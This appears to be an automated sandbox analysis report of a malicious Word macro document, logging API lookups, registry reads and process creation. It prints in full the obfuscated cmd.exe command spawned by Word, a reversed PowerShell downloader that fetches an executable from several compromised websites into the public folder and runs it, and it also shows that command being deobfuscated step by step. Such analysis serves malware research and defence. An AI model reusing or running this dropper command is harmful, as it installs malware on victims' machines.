Get Address	Unknown module name	function = MsoFHandledMessageNeeded, address_out = 0x7fee23fab10	1	Fn
Get Address	Unknown module name	function = MsoPeekMessage, address_out = 0x7fee23fa7d0	1	Fn
Get Address	Unknown module name	function = MsoFCreateIPref, address_out = 0x7fee23f1550	1	Fn
Get Address	Unknown module name	function = MsoDestroyIPref, address_out = 0x7fee23fe830	1	Fn
Get Address	Unknown module name	function = MsoChsFromLid, address_out = 0x7fee23f13d0	1	Fn
Get Address	Unknown module name	function = MsoCpgFromChs, address_out = 0x7fee23f6660	1	Fn
Get Address	Unknown module name	function = MsoSetLocale, address_out = 0x7fee23f1500	1	Fn
Get Address	Unknown module name	function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee23f3dd0	1	Fn
Get Address	Unknown module name	function = MsoSetVbaInterfaces, address_out = 0x7fee24f71e0	1	Fn
Get Address	Unknown module name	function = MsoGetControlInstanceId, address_out = 0x7fee24c6d10	1	Fn
Get Address	Unknown module name	function = VbeuiFIsEdpEnabled, address_out = 0x7fee25398e0	1	Fn
Get Address	Unknown module name	function = VbeuiEnterpriseProtect, address_out = 0x7fee2539830	1	Fn
Get Address	Unknown module name	function = SysFreeString, address_out = 0x7fefd8a1320	1	Fn
Get Address	Unknown module name	function = LoadTypeLib, address_out = 0x7fefd8af1e0	1	Fn
Get Address	Unknown module name	function = RegisterTypeLib, address_out = 0x7fefd8fcaa0	1	Fn
Get Address	Unknown module name	function = QueryPathOfRegTypeLib, address_out = 0x7fefd931760	1	Fn
Get Address	Unknown module name	function = UnRegisterTypeLib, address_out = 0x7fefd9320d0	2	Fn
Get Address	Unknown module name	function = OleTranslateColor, address_out = 0x7fefd8cc760	1	Fn
Get Address	Unknown module name	function = OleCreateFontIndirect, address_out = 0x7fefd8fecd0	1	Fn
Get Address	Unknown module name	function = OleCreatePictureIndirect, address_out = 0x7fefd8fe840	1	Fn
Get Address	Unknown module name	function = OleLoadPicture, address_out = 0x7fefd90f420	1	Fn
Get Address	Unknown module name	function = OleCreatePropertyFrameIndirect, address_out = 0x7fefd904ec0	1	Fn
Get Address	Unknown module name	function = OleCreatePropertyFrame, address_out = 0x7fefd909350	1	Fn
Get Address	Unknown module name	function = OleIconToCursor, address_out = 0x7fefd8d6e40	1	Fn
Get Address	Unknown module name	function = LoadTypeLibEx, address_out = 0x7fefd8aa550	2	Fn
Get Address	Unknown module name	function = OleLoadPictureEx, address_out = 0x7fefd90f320	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x772494f0	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromWindow, address_out = 0x77245f08	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromRect, address_out = 0x77242b00	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromPoint, address_out = 0x7723ab64	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x77245c30	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x7723a730	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayDevicesA, address_out = 0x7723a5b4	1	Fn
Get Address	Unknown module name	function = DispCallFunc, address_out = 0x7fefd8a2270	1	Fn
Get Address	Unknown module name	function = CreateTypeLib2, address_out = 0x7fefd92dbd0	1	Fn
Get Address	Unknown module name	function = VarDateFromUdate, address_out = 0x7fefd8a5c90	1	Fn
Get Address	Unknown module name	function = VarUdateFromDate, address_out = 0x7fefd8a6330	1	Fn
Get Address	Unknown module name	function = GetAltMonthNames, address_out = 0x7fefd8c66c0	1	Fn
Get Address	Unknown module name	function = VarNumFromParseNum, address_out = 0x7fefd8a4710	1	Fn
Get Address	Unknown module name	function = VarParseNumFromStr, address_out = 0x7fefd8a48f0	1	Fn
Get Address	Unknown module name	function = VarDecFromR4, address_out = 0x7fefd8db640	1	Fn
Get Address	Unknown module name	function = VarDecFromR8, address_out = 0x7fefd8db360	1	Fn
Get Address	Unknown module name	function = VarDecFromDate, address_out = 0x7fefd8e2640	1	Fn
Get Address	Unknown module name	function = VarDecFromI4, address_out = 0x7fefd8c58a0	1	Fn
Get Address	Unknown module name	function = VarDecFromCy, address_out = 0x7fefd8c5820	1	Fn
Get Address	Unknown module name	function = VarR4FromDec, address_out = 0x7fefd8daf20	1	Fn
Get Address	Unknown module name	function = GetRecordInfoFromTypeInfo, address_out = 0x7fefd8fa0c0	1	Fn
Get Address	Unknown module name	function = GetRecordInfoFromGuids, address_out = 0x7fefd932160	1	Fn
Get Address	Unknown module name	function = SafeArrayGetRecordInfo, address_out = 0x7fefd8c5af0	1	Fn
Get Address	Unknown module name	function = SafeArraySetRecordInfo, address_out = 0x7fefd8c5a90	1	Fn
Get Address	Unknown module name	function = SafeArrayGetIID, address_out = 0x7fefd8c5a60	1	Fn
Get Address	Unknown module name	function = SafeArraySetIID, address_out = 0x7fefd8c5a30	1	Fn
Get Address	Unknown module name	function = SafeArrayCopyData, address_out = 0x7fefd8a60b0	1	Fn
Get Address	Unknown module name	function = SafeArrayAllocDescriptorEx, address_out = 0x7fefd8a3e90	1	Fn
Get Address	Unknown module name	function = SafeArrayCreateEx, address_out = 0x7fefd8f9f80	1	Fn
Get Address	Unknown module name	function = VarFormat, address_out = 0x7fefd929b20	1	Fn
Get Address	Unknown module name	function = VarFormatDateTime, address_out = 0x7fefd929aa0	1	Fn
Get Address	Unknown module name	function = VarFormatNumber, address_out = 0x7fefd929990	1	Fn
Get Address	Unknown module name	function = VarFormatPercent, address_out = 0x7fefd929890	1	Fn
Get Address	Unknown module name	function = VarFormatCurrency, address_out = 0x7fefd929770	1	Fn
Get Address	Unknown module name	function = VarWeekdayName, address_out = 0x7fefd90b8d0	1	Fn
Get Address	Unknown module name	function = VarMonthName, address_out = 0x7fefd90b800	1	Fn
Get Address	Unknown module name	function = VarAdd, address_out = 0x7fefd9248e0	1	Fn
Get Address	Unknown module name	function = VarAnd, address_out = 0x7fefd929470	1	Fn
Get Address	Unknown module name	function = VarCat, address_out = 0x7fefd9296a0	1	Fn
Get Address	Unknown module name	function = VarDiv, address_out = 0x7fefd922fe0	1	Fn
Get Address	Unknown module name	function = VarEqv, address_out = 0x7fefd929cf0	1	Fn
Get Address	Unknown module name	function = VarIdiv, address_out = 0x7fefd928ff0	1	Fn
Get Address	Unknown module name	function = VarImp, address_out = 0x7fefd929c00	1	Fn
Get Address	Unknown module name	function = VarMod, address_out = 0x7fefd928e60	1	Fn
Get Address	Unknown module name	function = VarMul, address_out = 0x7fefd923690	1	Fn
Get Address	Unknown module name	function = VarOr, address_out = 0x7fefd9292d0	1	Fn
Get Address	Unknown module name	function = VarPow, address_out = 0x7fefd922e80	1	Fn
Get Address	Unknown module name	function = VarSub, address_out = 0x7fefd923f90	1	Fn
Get Address	Unknown module name	function = VarXor, address_out = 0x7fefd9291a0	1	Fn
Get Address	Unknown module name	function = VarAbs, address_out = 0x7fefd907c30	1	Fn
Get Address	Unknown module name	function = VarFix, address_out = 0x7fefd907a60	1	Fn
Get Address	Unknown module name	function = VarInt, address_out = 0x7fefd907890	1	Fn
Get Address	Unknown module name	function = VarNeg, address_out = 0x7fefd907ea0	1	Fn
Get Address	Unknown module name	function = VarNot, address_out = 0x7fefd929600	1	Fn
Get Address	Unknown module name	function = VarRound, address_out = 0x7fefd9076a0	1	Fn
Get Address	Unknown module name	function = VarCmp, address_out = 0x7fefd9283f0	1	Fn
Get Address	Unknown module name	function = VarDecAdd, address_out = 0x7fefd8d3070	1	Fn
Get Address	Unknown module name	function = VarDecCmp, address_out = 0x7fefd8dd700	1	Fn
Get Address	Unknown module name	function = VarBstrCat, address_out = 0x7fefd8dd890	1	Fn
Get Address	Unknown module name	function = VarCyMulI4, address_out = 0x7fefd8bcaf0	1	Fn
Get Address	Unknown module name	function = VarBstrCmp, address_out = 0x7fefd8c8a00	1	Fn
Get Address	Unknown module name	address_out = 0x7fee23ffcd0	1	Fn
Get Address	Unknown module name	function = 660, address_out = 0x7fee2d3fc00	1	Fn
Get Address	Unknown module name	function = 545, address_out = 0x7fee2d38140	1	Fn
Get Address	Unknown module name	function = 600, address_out = 0x7fee2cd4ee0	1	Fn
Get Address	Unknown module name	function = 608, address_out = 0x7fee2d3ae28	1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = ThunderMain, wndproc_parameter = 0		1	Fn

System (31)

Operation	Additional Information	Count	Logfile
Get Cursor	x_out = 1350, y_out = 851	3	Fn
Get Time	type = System Time, time = 2018-09-07 17:12:41 (UTC)	1	Fn
Get Time	type = Ticks, time = 132881	1	Fn
Get Time	type = Local Time, time = 2018-09-07 17:12:44 (Local Time)	14	Fn
Get Time	type = Local Time, time = 2018-09-07 17:12:45 (Local Time)	1	Fn
Get Time	type = Ticks, time = 139964	7	Fn
Get Info	type = Operating System	2	Fn
Get Info	type = Operating System	2	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = DDRYBUR		1	Fn

Process #2: cmd.exe

3734

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	cmd /V^:/C"^s^et z^q^j8=^ ^ ^ ^ ^ ^ ^}}{^hctac^};k^aerb^;jq^j$ ^me^t^I-^ekovnI;)^jqj^$^ ^,VT^O^$(e^liFdao^ln^w^oD^.VR^T^${^yrt{)pm^i^$ n^i VT^O$(^hca^er^of;'^ex^e.'^+FaR^$+^'^\^'+ci^lb^up^:vne$^=j^q^j$^;'8^24^'^ ^=^ ^FaR$^;)^'@^'(tilpS.'^6^XLE^B^d^b^EF^k/^moc^.se^i^g^ol^on^hc^etnavda//^:^p^tt^h^@^g59QLoG/au^.m^oc^.s^p^i^hc^do^o^w//^:p^tth@6Ur^grTZD/^tnetn^oc^-^p^w/ri^.ca^.umhs^.^udrc//:^p^t^th^@F^D^8vH^fL/^sd^a^o^lpu/tn^etnoc^-p^w/m^oc.^tesrocv^.w^w^w//:^p^t^th^@^0^gD^5^e1w^b/^tn^e^tnoc-p^w/di.c^a.gn^a^lam^-n^iu.^i^s^amra^f//^:^ptt^h'=^p^mi^$^;tn^e^i^lC^be^W.^teN^ ^tce^j^bo-wen^=VRT$^ l^l^e^h^sr^ewo^p&&^for /^L %^y ^in (4^26,-^1,^0)^do ^se^t 5^d^UZ=!5^d^UZ!!z^q^j8:~%^y,1!&&^i^f %^y ^l^s^s ^1 ca^l^l %5^d^UZ:^~^6%"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:11, Reason: Child Process
Unmonitor	End Time: 00:01:52, Reason: Self Terminated
Monitor Duration	00:00:41

OS Process Information

Information	Value
PID	0xb44
Parent PID	0x938 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B48

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000150000	0x00150000	0x0015ffff	Private Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x0046ffff	Private Memory	rw	-
private_0x0000000000470000	0x00470000	0x0056ffff	Private Memory	rw	-
pagefile_0x0000000000570000	0x00570000	0x006f7fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000700000	0x00700000	0x00880fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000890000	0x00890000	0x01c8ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001c90000	0x01c90000	0x01fd2fff	Pagefile Backed Memory	r	-
cmd.exe	0x4a1a0000	0x4a1f8fff	Memory Mapped File	rwx	-
user32.dll	0x77230000	0x77329fff	Memory Mapped File	rwx	-
kernel32.dll	0x77330000	0x7744efff	Memory Mapped File	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fee2110000	0x7fee2117fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefd6c0000	0x7fefd72afff	Memory Mapped File	rwx	-
msctf.dll	0x7fefdb90000	0x7fefdc98fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefee60000	0x7fefee8dfff	Memory Mapped File	rwx	-
usp10.dll	0x7fefee90000	0x7fefef58fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7fefef60000	0x7fefeffefff	Memory Mapped File	rwx	-
lpk.dll	0x7feff5f0000	0x7feff5fdfff	Memory Mapped File	rwx	-
gdi32.dll	0x7feff600000	0x7feff666fff	Memory Mapped File	rwx	-
apisetschema.dll	0x7feff770000	0x7feff770fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffdcfff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	rw	-

Host Behavior

File (3307)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\aETAdzjz\Documents	type = file_attributes	2	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	660	Fn
Open	STD_OUTPUT_HANDLE	-	1983	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Write	STD_OUTPUT_HANDLE	size = 2	132	Fn Data
Write	STD_OUTPUT_HANDLE	size = 28	66	Fn Data
Write	STD_OUTPUT_HANDLE	size = 3	132	Fn Data
Write	STD_OUTPUT_HANDLE	size = 26	66	Fn Data
Write	STD_OUTPUT_HANDLE	size = 4	132	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	66	Fn Data
Write	STD_OUTPUT_HANDLE	size = 11	66	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	os_pid = 0xb64, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x4a1a0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x77330000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x77346d40	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x773423d0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x77338290	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x773417e0	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-09-07 17:12:45 (UTC)		1	Fn
Get Time	type = Ticks, time = 137483		1	Fn

Environment (397)

Operation	Additional Information	Count	Logfile
Get Environment String	-	8	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Get Environment String	name = ^y ^in (4^26,-^1,^0)^do ^se^t 5^d^UZ=!5^d^UZ!!z^q^j8	1	Fn
Get Environment String	name = ^y,1!&&^i^f	1	Fn
Get Environment String	name = ^y ^l^s^s ^1 ca^l^l	1	Fn
Get Environment String	name = 5^d^UZ	1	Fn
Get Environment String	name = PROMPT, result_out = $P$G	125	Fn
Get Environment String	name = 5dUZ	1	Fn
Get Environment String	name = zqj8, result_out = }}{hctac};kaerb;jqj$ metI-ekovnI;)jqj$ ,VTO$(eliFdaolnwoD.VRT${yrt{)pmi$ ni VTO$(hcaerof;'exe.'+FaR$+'\'+cilbup:vne$=jqj$;'824' = FaR$;)'@'(tilpS.'6XLEBdbEFk/moc.seigolonhcetnavda//:ptth@g59QLoG/au.moc.spihcdoow//:ptth@6UrgrTZD/tnetnoc-pw/ri.ca.umhs.udrc//:ptth@FD8vHfL/sdaolpu/tnetnoc-pw/moc.tesrocv.www//:ptth@0gD5e1wb/tnetnoc-pw/di.ca.gnalam-niu.isamraf//:ptth'=pmi$;tneilCbeW.teN tcejbo-wen=VRT$ llehsrewop	124	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!p	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!po	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!pow	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powe	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!power	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powers	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powersh	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershe	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershel	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $T	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TR	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=n	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=ne	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-o	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-ob	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-obj	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-obje	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-objec	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object N	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Ne	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.W	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.We	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.Web	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebC	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebCl	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebCli	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClie	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClien	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$i	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$im	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp=	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='h	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='ht	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='htt	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http:	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http:/	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://f	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://fa	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://far	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farm	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farma	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmas	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.	1	Fn
Get Environment String	name = 5dUZ	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.ui	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-m	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-ma	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-mal	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-mala	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malan	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.a	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.i	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/w	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-c	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-co	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-con	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-cont	1	Fn
Get Environment String	name = 5dUZ, result_out = !5dUZ!powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-conte	1	Fn
